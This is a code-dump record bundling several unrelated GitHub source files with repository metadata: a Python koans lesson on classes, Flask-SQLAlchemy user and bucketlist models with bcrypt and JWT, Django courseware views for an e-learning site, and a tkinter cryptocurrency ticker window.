"id": "6818b1771cee6d0efba463a134489a2dda02c178",
"size": "3663",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bokeh/models/tickers.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5455"
},
{
"name": "CSS",
"bytes": "413470"
},
{
"name": "CoffeeScript",
"bytes": "2117773"
},
{
"name": "HTML",
"bytes": "72852"
},
{
"name": "JavaScript",
"bytes": "7337"
},
{
"name": "Makefile",
"bytes": "5785"
},
{
"name": "Python",
"bytes": "1560447"
},
{
"name": "Shell",
"bytes": "18109"
}
],
"symlink_target": ""
} |
from runner.koan import *
class AboutClasses(Koan):
class Dog(object):
"Dogs need regular walkies. Never, ever let them drive."
def test_instances_of_classes_can_be_created_adding_parentheses(self):
fido = self.Dog()
self.assertEqual('Dog', fido.__class__.__name__)
def test_classes_have_docstrings(self):
self.assertMatch("Dogs need regular walkies. Never, "+
"ever let them drive.", self.Dog.__doc__)
# ------------------------------------------------------------------
class Dog2(object):
def __init__(self):
self._name = 'Paul'
def set_name(self, a_name):
self._name = a_name
def test_init_method_is_the_constructor(self):
dog = self.Dog2()
self.assertEqual('Paul', dog._name)
def test_private_attributes_are_not_really_private(self):
dog = self.Dog2()
dog.set_name("Fido")
self.assertEqual('Fido', dog._name)
# The _ prefix in _name implies private ownership, but nothing is truly
# private in Python.
def test_you_can_also_access_the_value_out_using_getattr_and_dict(self):
fido = self.Dog2()
fido.set_name("Fido")
self.assertEqual('Fido', getattr(fido, "_name"))
# getattr(), setattr() and delattr() are a way of accessing attributes
# by method rather than through assignment operators
self.assertEqual('Fido', fido.__dict__["_name"])
# Yes, this works here, but don't rely on the __dict__ object! Some
# class implementations use optimization which result in __dict__ not
# showing everything.
# ------------------------------------------------------------------
class Dog3(object):
def __init__(self):
self._name = None
def set_name(self, a_name):
self._name = a_name
def get_name(self):
return self._name
name = property(get_name, set_name)
def test_that_name_can_be_read_as_a_property(self):
fido = self.Dog3()
fido.set_name("Fido")
self.assertEqual('Fido', fido.get_name()) # access as method
self.assertEqual('Fido', fido.name) # access as property
# ------------------------------------------------------------------
class Dog4(object):
def __init__(self):
self._name = None
@property
def name(self):
return self._name
@name.setter
def name(self, a_name):
self._name = a_name
def test_creating_properties_with_decorators_is_slightly_easier(self):
fido = self.Dog4()
fido.name = "Fido"
self.assertEqual('Fido', fido.name)
# ------------------------------------------------------------------
class Dog5(object):
def __init__(self, initial_name):
self._name = initial_name
@property
def name(self):
return self._name
def test_init_provides_initial_values_for_instance_variables(self):
fido = self.Dog5("Fido")
self.assertEqual('Fido', fido.name)
def test_args_must_match_init(self):
self.assertRaises(TypeError, self.Dog5) # Evaluates self.Dog5()
# THINK ABOUT IT:
# Why is this so?
def test_different_objects_have_different_instance_variables(self):
fido = self.Dog5("Fido")
rover = self.Dog5("Rover")
self.assertEqual(False, rover.name == fido.name)
# ------------------------------------------------------------------
class Dog6(object):
def __init__(self, initial_name):
self._name = initial_name
def get_self(self):
return self
def __str__(self):
return 'Fido'
def __repr__(self):
return "<Dog named '" + self._name + "'>"
def test_inside_a_method_self_refers_to_the_containing_object(self):
fido = self.Dog6("Fido")
self.assertEqual(fido, fido.get_self()) # Not a string!
def test_str_provides_a_string_version_of_the_object(self):
fido = self.Dog6("Fido")
self.assertEqual("Fido", str(fido))
def test_str_is_used_explicitly_in_string_interpolation(self):
fido = self.Dog6("Fido")
self.assertEqual('My dog is Fido', "My dog is " + str(fido))
def test_repr_provides_a_more_complete_string_version(self):
fido = self.Dog6("Fido")
self.assertEqual("<Dog named 'Fido'>", repr(fido))
def test_all_objects_support_str_and_repr(self):
seq = [1, 2, 3]
self.assertEqual('[1, 2, 3]', str(seq))
self.assertEqual('[1, 2, 3]', repr(seq))
self.assertEqual('STRING', str("STRING"))
self.assertEqual("'STRING'", repr("STRING"))
| {
"content_hash": "64ac6991ee51b0745322f161a7128c83",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 79,
"avg_line_length": 31.038709677419355,
"alnum_prop": 0.5364789025150696,
"repo_name": "topliceanu/learn",
"id": "2d2a473efa44006a83cdde4b6a896392a34a16e7",
"size": "4858",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/python_koans/python2/koans/about_classes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2259"
},
{
"name": "C",
"bytes": "50301"
},
{
"name": "CSS",
"bytes": "2376"
},
{
"name": "Clojure",
"bytes": "40105"
},
{
"name": "DIGITAL Command Language",
"bytes": "191608"
},
{
"name": "Dockerfile",
"bytes": "557"
},
{
"name": "Elm",
"bytes": "35974"
},
{
"name": "Forth",
"bytes": "128"
},
{
"name": "Go",
"bytes": "277187"
},
{
"name": "HTML",
"bytes": "750204"
},
{
"name": "Haskell",
"bytes": "57709"
},
{
"name": "JavaScript",
"bytes": "3327208"
},
{
"name": "Makefile",
"bytes": "3280"
},
{
"name": "OCaml",
"bytes": "157277"
},
{
"name": "PowerShell",
"bytes": "3022"
},
{
"name": "Procfile",
"bytes": "230"
},
{
"name": "Pug",
"bytes": "846"
},
{
"name": "Python",
"bytes": "1383229"
},
{
"name": "Racket",
"bytes": "7552"
},
{
"name": "Reason",
"bytes": "43"
},
{
"name": "Roff",
"bytes": "116"
},
{
"name": "Ruby",
"bytes": "134845"
},
{
"name": "Rust",
"bytes": "146828"
},
{
"name": "Shell",
"bytes": "9006"
},
{
"name": "Solidity",
"bytes": "1347"
},
{
"name": "TypeScript",
"bytes": "254"
},
{
"name": "Vue",
"bytes": "1504"
}
],
"symlink_target": ""
} |
from flask_sqlalchemy import SQLAlchemy
from application import app, db, SECRET_KEY
from sqlalchemy.sql import func
import bcrypt
import jwt
from datetime import datetime, timedelta
class User(db.Model):
""" Creates users on the system """
__tablename__ = "users"
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80), unique=True)
email = db.Column(db.String(120), unique=True)
password = db.Column(db.String)
bucketlists = db.relationship('Bucketlist', backref='author', lazy='dynamic')
def set_password(self, password):
""" hash and set the new users password """
hashed_password = bcrypt.hashpw(password.encode(), bcrypt.gensalt())
self.password = hashed_password
def check_password(self, password):
""" Check user password at login """
return True if bcrypt.checkpw(password.encode(), self.password) else False
def generate_auth(self):
""" generate authentication token """
payload = {'id': self.id,
'exp': datetime.utcnow() + timedelta(seconds=600),
"iat": datetime.utcnow()
}
# encode payload and return auth_token
auth_token = jwt.encode(payload, SECRET_KEY).decode()
return auth_token
def save(self):
""" Save a user into the database """
db.session.add(self)
db.session.commit()
def __repr__(self):
return '<User %r>' % self.username
class Bucketlist(db.Model):
""" creates bucket lists """
__tablename__ = 'bucketlists'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80))
created_by = db.Column(db.Integer, db.ForeignKey('users.email'))
date_created = db.Column(db.DateTime, default=datetime.utcnow())
date_modified = db.Column(db.DateTime, onupdate=datetime.utcnow())
items = db.relationship('Item', backref='bucketlist', lazy='dynamic')
def save(self):
""" Save a bucketlist into the database """
db.session.add(self)
db.session.commit()
def delete(self):
""" delete a bucketlist from the database """
db.session.delete(self)
db.session.commit()
def __repr__(self):
return '<Bucketlist %r>' % self.name
class Item(db.Model):
""" Creates bucketlist items """
__tablename__ = 'items'
id = db.Column(db.Integer, primary_key=True)
description = db.Column(db.String(120))
is_done = db.Column(db. String, default="False")
date_created = db.Column(db.DateTime, default=datetime.utcnow())
date_modified = db.Column(db.DateTime, onupdate=datetime.utcnow())
bucketlist_id = db.Column(db.Integer, db.ForeignKey('bucketlists.id'))
def save(self):
""" Save an item into the database """
db.session.add(self)
db.session.commit()
def delete(self):
""" delete an item from database """
db.session.delete(self)
db.session.commit()
def __repr__(self):
return '<item %r>' % self.description
| {
"content_hash": "4411a38056504ea20eb06e24b89f617f",
"timestamp": "",
"source": "github",
"line_count": 98,
"max_line_length": 82,
"avg_line_length": 31.397959183673468,
"alnum_prop": 0.6243093922651933,
"repo_name": "bmwachajr/bucketlist",
"id": "64dca552c105c53c5f52b97cef1a7bbcbe8b84ad",
"size": "3077",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "application/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "53425"
}
],
"symlink_target": ""
} |
"""
This file basically contains viewsets for the courseware API
Category API:
- List, Create, Update, Retrieve, Destroy, Partial Update Category
- Get all courses in a category
- Add a course in that category
Course API:
- Retrieve, Update, Partial Update, Destroy info of a course
- Retrieve, Update, Partial update courseinfo
- List all the students in a course with their history
- Create, update, parital update, Retrieve course history
- List all concepts in a course
- Create, Retrieve, Update, Partial Update a concept
CourseHistory API:
- List all the concept history in that coursehistory
Concept API:
- Destroy a concept
- Retrieve, Update Concept history
- playlist
- Create a learning element
"""
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404, render
from elearning_academy.permissions import InInstructorOrContentDeveloperMode, get_mode
from elearning_academy.permissions import InInstructorMode, InContentDeveloperMode
from courseware.models import Course, CourseHistory
from courseware.vsserializers.course import CourseSerializer, CourseInfoSerializer
from rest_framework import status
from django.http import HttpResponse
import json
from django.utils import timezone
inInstructorOrContentDeveloperModeObject = InInstructorOrContentDeveloperMode()
inInstructorModeObject = InInstructorMode()
inContentDeveloperModeObject = InContentDeveloperMode()
def parent_categories(request):
"""
Serves parent_categories.html template
"""
context = {"request": request}
return render(request, "category/parent_categories.html", context)
def categories(request, pk):
"""
Serves categories.html template
"""
context = {"request": request, "pk": pk}
return render(request, "category/categories.html", context)
@login_required
def add_course(request):
"""
Serves course_admin.html template
"""
if request.user.get_profile().is_instructor:
context = {"request": request}
return render(request, "course/course_admin.html", context)
else:
context = {
"request": request,
"error": "You have to be an instructor to add a course."
}
return render(request, "error.html", context)
def courses(request, pk):
"""Serves categories courses"""
context = {"request": request, 'pk': pk}
return render(request, "category/courses.html", context)
@login_required
def course(request, pk=None, ref=None):
"""Serves a course main page"""
_course = get_object_or_404(Course, pk=pk)
context = {"request": request, "course": _course}
if ref is not None and len(ref) > 0:
context["ref"] = ref
else:
context["ref"] = "-1"
mode = get_mode(request)
history = CourseHistory.objects.filter(user=request.user, course=_course, active='A')
if mode == 'I' or mode == 'C':
if len(history) > 0:
if history[0].is_owner:
return render(request, "content_developer/course.html", context)
return render(request, "student/course.html", context)
#elif mode == 'S':
else:
if len(history) > 0:
return render(request, "student/course.html", context)
course_data = CourseSerializer(_course).data
if course_data['course_info']['start_time']:
s_date = course_data['course_info']['start_time'].strftime('%d %b,%Y')
course_data['course_info']['start_time'] = s_date
if course_data['course_info']['end_time']:
e_date = course_data['course_info']['end_time'].strftime('%d %b,%Y')
course_data['course_info']['end_time'] = e_date
if course_data['course_info']['end_enrollment_date']:
end_e_date = course_data['course_info']['end_enrollment_date'].strftime('%d %b,%Y')
course_data['course_info']['end_enrollment_date'] = end_e_date
context = {
"request": request,
"title": course_data['title'],
"course": json.dumps(course_data),
"course_info": json.dumps(course_data['course_info'])
}
return render(request, "course/public_course_info.html", context)
return HttpResponse("Forbidden", status.HTTP_403_FORBIDDEN)
@login_required
def syllabus(request, pk=None):
"""Serves a course main page"""
_course = get_object_or_404(Course, pk=pk)
context = {"request": request, "course": _course}
if request.user.get_profile().is_instructor:
return render(request, "instructor/syllabus.html", context)
else:
context = {
"request": request,
"error": "You have to be an instructor to see syllabus."
}
return render(request, "error.html", context)
@login_required
def student_courses(request):
"""
Serve enrolled course list for a student
"""
response = student_course_list(request)
context = {"data": json.dumps(response)}
return render(request, "student/my_courses.html", context)
@login_required
def instructor_courses(request):
"""
Added by vinayak, needs to be verified from writer of instructor_course_list()
Serve offered course list for a instructor (?)
"""
if inInstructorModeObject.has_permission(request, None):
response = instructor_course_list(request)
context = {"data": json.dumps(response)}
return render(request, "instructor/my_offerings.html", context)
else:
context = {
"request": request,
"error": "Invalid Access. Change mode or contact admin"
}
return render(request, "error.html", context)
@login_required
def content_developer_courses(request):
"""
Serves textbook course list for a content developer
"""
if inContentDeveloperModeObject.has_permission(request, None):
response = content_developer_course_list(request)
context = {"data": json.dumps(response)}
#: Need to change the page for content developer courses
print "New Textbook Page"
return render(request, "content_developer/my_textbooks.html", context)
else:
context = {
"request": request,
"error": "Invalid Access.Change mode or contact admin"
}
return render(request, "error.html", context)
@login_required
def mycourselist(request):
"""
Obselete. Purpose not clear
Serves the enrolled course list for a student
"""
mode = get_mode(request)
if mode == 'I':
return instructor_courses(request)
elif mode == 'C':
return content_developer_courses(request)
#elif mode == 'S':
# return student_courses(request)
#return HttpResponse("Forbidden", status.HTTP_403_FORBIDDEN)
else:
return student_courses(request)
@login_required
def content_developer_course_list(request):
"""
Return a list of courses being developed by user as a content developer
"""
date_format = "%d %b, %Y"
history_list = CourseHistory.objects.filter(user=request.user, is_owner=True, course__type='T')
all_courses = []
for history in history_list:
if history.course.type == 'T':
all_courses.append(history.course)
all_courses_data = [CourseSerializer(c).data for c in all_courses]
cur_datetime = timezone.now().date()
##Course Current Status in coursetag.
## 1 => active
## 2 => Future
## 3 => past
all_coursetag = []
start_date = []
all_course_progress = []
for c_data in all_courses_data:
c_info = c_data['course_info']
if (c_info['end_time'] is None or cur_datetime < c_info['start_time']):
tag = 2
elif (cur_datetime > c_info['end_time']):
tag = 3
else:
tag = 1
all_coursetag.append({"is_published": c_info['is_published'], "coursetag": tag})
if c_info['end_time'] is None or c_info['start_time'] is None:
progress = 0
else:
elapsed_time = (cur_datetime - c_info['start_time']).days
total_time = (c_info['end_time'] - c_info['start_time']).days
progress = (float)(100 * elapsed_time / total_time)
if progress > 100:
progress = 100
elif progress < 0:
progress = 0
all_course_progress.append({"progress": progress})
if (c_info['start_time'] is not None):
s_date = c_info['start_time'].strftime(date_format)
c_data['course_info']['start_time'] = s_date
else:
s_date = "Not Decided"
if (c_info['end_time'] is not None):
e_date = c_info['end_time'].strftime(date_format)
c_data['course_info']['end_time'] = e_date
else:
e_date = "Not Decided"
start_date.append({
"start_date": s_date,
"end_date": e_date,
"start_time": s_date,
"end_time": e_date
})
if (c_info['end_enrollment_date']):
end_e_date = c_info['end_enrollment_date'].strftime(date_format)
c_data['course_info']['end_enrollment_date'] = end_e_date
response = []
for i in range(len(all_courses_data)):
response.append((dict(all_course_progress[i].items() + all_coursetag[i].items() +
all_courses_data[i].items() + start_date[i].items())))
response = sort_my_courses(response)
return response
@login_required
def instructor_course_list(request):
"""
Return a list of courses which are offered by the user as instructor
"""
date_format = "%d %b, %Y"
history_list = CourseHistory.objects.filter(user=request.user, is_owner=True, course__type='O')
all_courses = []
for history in history_list:
if history.course.type == 'O':
all_courses.append(history.course)
all_courses_data = [CourseSerializer(c).data for c in all_courses]
cur_datetime = timezone.now().date()
##Course Current Status in coursetag.
## 1 => active
## 2 => Future
## 3 => past
all_coursetag = []
start_date = []
all_course_progress = []
for c_data in all_courses_data:
c_info = c_data['course_info']
if (c_info['end_time'] is None or cur_datetime < c_info['start_time']):
tag = 2
elif (cur_datetime > c_info['end_time']):
tag = 3
else:
tag = 1
all_coursetag.append({"is_published": c_info['is_published'], "coursetag": tag})
if c_info['end_time'] is None or c_info['start_time'] is None:
progress = 0
else:
elapsed_time = (cur_datetime - c_info['start_time']).days
total_time = (c_info['end_time'] - c_info['start_time']).days
progress = (float)(100 * elapsed_time / total_time)
if progress > 100:
progress = 100
elif progress < 0:
progress = 0
all_course_progress.append({"progress": progress})
if (c_info['start_time'] is not None):
s_date = c_info['start_time'].strftime(date_format)
c_data['course_info']['start_time'] = s_date
else:
s_date = "Not Decided"
if (c_info['end_time'] is not None):
e_date = c_info['end_time'].strftime(date_format)
c_data['course_info']['end_time'] = e_date
else:
e_date = "Not Decided"
start_date.append({
"start_date": s_date,
"end_date": e_date,
"start_time": s_date,
"end_time": e_date
})
if c_info['end_enrollment_date']:
end_e_date = c_info['end_enrollment_date'].strftime(date_format)
c_data['course_info']['end_enrollment_date'] = end_e_date
response = []
for i in range(len(all_courses_data)):
response.append((dict(all_course_progress[i].items() + all_coursetag[i].items() +
all_courses_data[i].items() + start_date[i].items())))
response = sort_my_courses(response)
return response
@login_required
def student_course_list(request):
"""
Return a list of all courses where the student is enrolled
"""
date_format = "%d %b, %Y"
history_list = CourseHistory.objects.filter(user=request.user, active='A', is_owner=False)
all_courses = []
for history in history_list:
if history.course.type == 'O':
all_courses.append(history.course)
all_courses_data = [CourseSerializer(c).data for c in all_courses]
cur_datetime = timezone.now().date()
##Course Current Status in coursetag.
## 1 => active
## 2 => Future
## 3 => past
all_coursetag = []
start_date = []
all_course_progress = []
for c_data in all_courses_data:
c_info = c_data['course_info']
if (c_info['end_time'] is None or cur_datetime < c_info['start_time']):
tag = 2
elif (cur_datetime > c_info['end_time']):
tag = 3
else:
tag = 1
all_coursetag.append({"is_published": c_info['is_published'], "coursetag": tag})
if c_info['end_time'] is None or c_info['start_time'] is None:
progress = 0
else:
elapsed_time = (cur_datetime - c_info['start_time']).days
total_time = (c_info['end_time'] - c_info['start_time']).days
progress = (float)(100 * elapsed_time / total_time)
if progress > 100:
progress = 100
elif progress < 0:
progress = 0
all_course_progress.append({"progress": progress})
if (c_info['start_time'] is not None):
s_date = c_info['start_time'].strftime(date_format)
c_data['course_info']['start_time'] = s_date
else:
s_date = "Not Decided"
if (c_info['end_time'] is not None):
e_date = c_info['end_time'].strftime(date_format)
c_data['course_info']['end_time'] = e_date
else:
e_date = "Not Decided"
start_date.append({
"start_date": s_date,
"end_date": e_date,
"start_time": s_date,
"end_time": e_date
})
if c_info['end_enrollment_date']:
end_e_date = c_info['end_enrollment_date'].strftime(date_format)
c_data['course_info']['end_enrollment_date'] = end_e_date
response = []
for i in range(len(all_courses_data)):
response.append((dict(all_course_progress[i].items() + all_coursetag[i].items() +
all_courses_data[i].items() + start_date[i].items())))
response = sort_my_courses(response)
return response
def coursecmp(x, y):
if(x['coursetag'] > y['coursetag']):
return 1
elif(x['coursetag'] < y['coursetag']):
return -1
elif (x['start_time'] is not None) and (y['start_time'] is not None) and (x['start_time'] < y['start_time']):
return -1
return 1
def sort_my_courses(response):
#sorted_master_list = sorted(response, key=itemgetter('coursetag'))
sorted_master_list = sorted(response, cmp=coursecmp)
return sorted_master_list
def dateToString(start_date):
""" Convert the DateField to a printable string """
return start_date.strftime("%d %B")
def paginated_serializer(request=None, queryset=None, serializer=None, paginate_by=5):
"""
Returns the serializer containing objects corresponding to paginated page.
Abstract Functionality can be used by all.
"""
paginator = Paginator(queryset, paginate_by)
page = request.QUERY_PARAMS.get('page')
try:
items = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
items = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999),
# deliver last page of results.
items = paginator.page(paginator.num_pages)
serializer_context = {'request': request}
return serializer(items, context=serializer_context)
def to_do(request):
"""
Functionality to be added
"""
return HttpResponse("Functionality to be added")
def instructor_course_list_old(request):
histories = CourseHistory.objects.filter(user=request.user, is_owner=True, course__type='O')
my_courses = [history.course for history in histories]
my_courses = [CourseSerializer(course).data for course in my_courses]
my_courses = [history.course for history in histories]
my_courses_info = [CourseInfoSerializer(course.course_info).data for course in my_courses]
current_datetime = timezone.now().date()
# Calculating CourseTag for all the courses. Coursetag = 1 => active course, coursetag = 2 =>
# future course
# and coursetag = 3 => past course
coursetag = [{"is_published": element['is_published'], "coursetag": 2 if (element['end_time'] == None or current_datetime < element['start_time']) else 3 if (current_datetime > element['end_time']) else 1} for element in my_courses_info]
# Calculating printable dates
start_date = [{"start_date": dateToString(element['start_time']) if element['start_time'] != None else "Not Decided" , "end_date": dateToString(element['end_time']) if element['end_time'] != None else "Not Decided"} for element in my_courses_info]
# Calculating the progress of every course on teh basis of current date, course start date and course end date
my_courses_progress = [0 if (element['end_time'] == None or element['start_time'] == None) else (float) (100*(current_datetime - element['start_time']).days/(element['end_time']-element['start_time']).days) for element in my_courses_info]
my_courses_progress = [{"progress": element if(element <= 100) else 100} for element in my_courses_progress]
my_courses = [CourseSerializer(course).data for course in my_courses]
# Appending the course progress and coursetag to the response
response = [(dict(my_courses_progress[i].items() + my_courses[i].items() + coursetag[i].items() + start_date[i].items())) for i in range(len(my_courses))]
# Converting teh start and end date of courses to string to make it JSOn serializable
my_courses_info = [{"start_time": str(element['start_time']), "end_time" : str(element['end_time'])} for element in my_courses_info]
# Appending the course end and start date to the response
response = [(dict(response[i].items() + my_courses_info[i].items())) for i in range(len(response))]
# Sorting the results
response = sort_my_courses(response)
return response
| {
"content_hash": "5d94888f7a16d9aa30a0e330525e749e",
"timestamp": "",
"source": "github",
"line_count": 498,
"max_line_length": 251,
"avg_line_length": 37.75100401606426,
"alnum_prop": 0.6154255319148936,
"repo_name": "kartikshah1/Test",
"id": "f3825ac7f412bc30934e570b8874c862d446065d",
"size": "18800",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "courseware/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "21691"
},
{
"name": "C++",
"bytes": "3267"
},
{
"name": "CSS",
"bytes": "355299"
},
{
"name": "Java",
"bytes": "9833"
},
{
"name": "JavaScript",
"bytes": "2844415"
},
{
"name": "Perl",
"bytes": "4202"
},
{
"name": "Python",
"bytes": "1703618"
},
{
"name": "Shell",
"bytes": "6379"
}
],
"symlink_target": ""
} |
import tkinter as tk
from time import sleep
from playsound import playsound
import config
import fasttick
from helpmessage import fasttick_help_message
import misc
from tickerwindow import TickerWindow
class GUIfasttick(TickerWindow):
def __init__(self, app):
super().__init__(app)
misc.delete_ancient_pickles('fasttick_history')
self.draw_labels()
self.draw_buttons()
self.draw_lists()
self.draw_timer()
self.timer_update()
def draw_labels(self):
self.labelName.grid(row=3, column=0, sticky='NSWE')
self.labelChange.config(text='Rate')
self.labelChange.grid(row=3, column=1, sticky='NSWE')
self.labelVol.grid(row=3, column=2, sticky='NSWE')
self.labelBuf.grid(row=3, rowspan=2, column=3, columnspan=2, sticky='NSWE')
def draw_buttons(self):
self.sortByName.grid(row=4, column=0, sticky='NSWE')
self.sortByChange.grid(row=4, column=1, sticky='NSWE')
self.sortByVol.grid(row=4, column=2, sticky='NSWE')
self.notifyBell.grid(row=4, column=3, sticky='NSWE')
self.help.grid(row=3, column=4, sticky='E')
def on_click_help(self):
helpWindow = tk.Toplevel()
helpWindow.title('Help')
frameBuf = tk.Frame(helpWindow, width=192, bg=config.MAIN_BG)
frameBuf.grid(row=0, rowspan=4, column=0, columnspan=3)
message = tk.Message(frameBuf, bg=config.MAIN_BG, fg=config.TEXT_COLOR,
width=192, text=fasttick_help_message)
message.grid(row=0, columnspan=3)
dismissButton = tk.Button(frameBuf, text='Dismiss', command=helpWindow.destroy)
dismissButton.grid(row=1, column=1)
def draw_lists(self):
self.yScroll.grid(row=5, column=3, sticky='NSWE')
self.listName.grid(row=5, column=0, sticky='NSWE')
self.listChange.grid(row=5, column=1, sticky='NSWE')
self.listVol.grid(row=5, column=2, sticky='NSWE')
def draw_timer(self):
self.timerLabel.grid(row=5, column=4, ipadx=8)
self.timerFrame.grid(row=5, column=4, columnspan=3)
self.timerDisp.grid(row=5, column=4)
self.timerValue = config.FASTTICK_RATE
def timer_update(self):
if self.timerValue == 3:
self.async = self.pool.apply_async(fasttick.heartbeat)
if self.timerValue == 0:
while True:
if self.async.ready():
break
for i in range(1, 4):
if self.async.ready():
break
self.timerDisp.config(text=f'{"." * i}', font=('', 20))
self.app.update()
sleep(1)
self.ticker_data = self.async.get()
self.sort_ticker()
if self.notifyIsActive and self.ticker_data:
playsound('media/notification_sound.mp3')
self.timerValue = config.FASTTICK_RATE
values = divmod(self.timerValue, 60)
minutes = values[0]
seconds = values[1]
self.timerDisp.config(text=f'{minutes}:{seconds:0>2}', font=('', 20))
self.timerValue -= 1
self.app.after(1000, self.timer_update) | {
"content_hash": "43b5e2be82cab3faa6eff985dde5f0da",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 87,
"avg_line_length": 36.93103448275862,
"alnum_prop": 0.599128540305011,
"repo_name": "JevinJ/Bittrex-Notify",
"id": "a7b178488e1bd5423d91d96fd5e4350b6f445f15",
"size": "3213",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/GUIfasttick.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25145"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.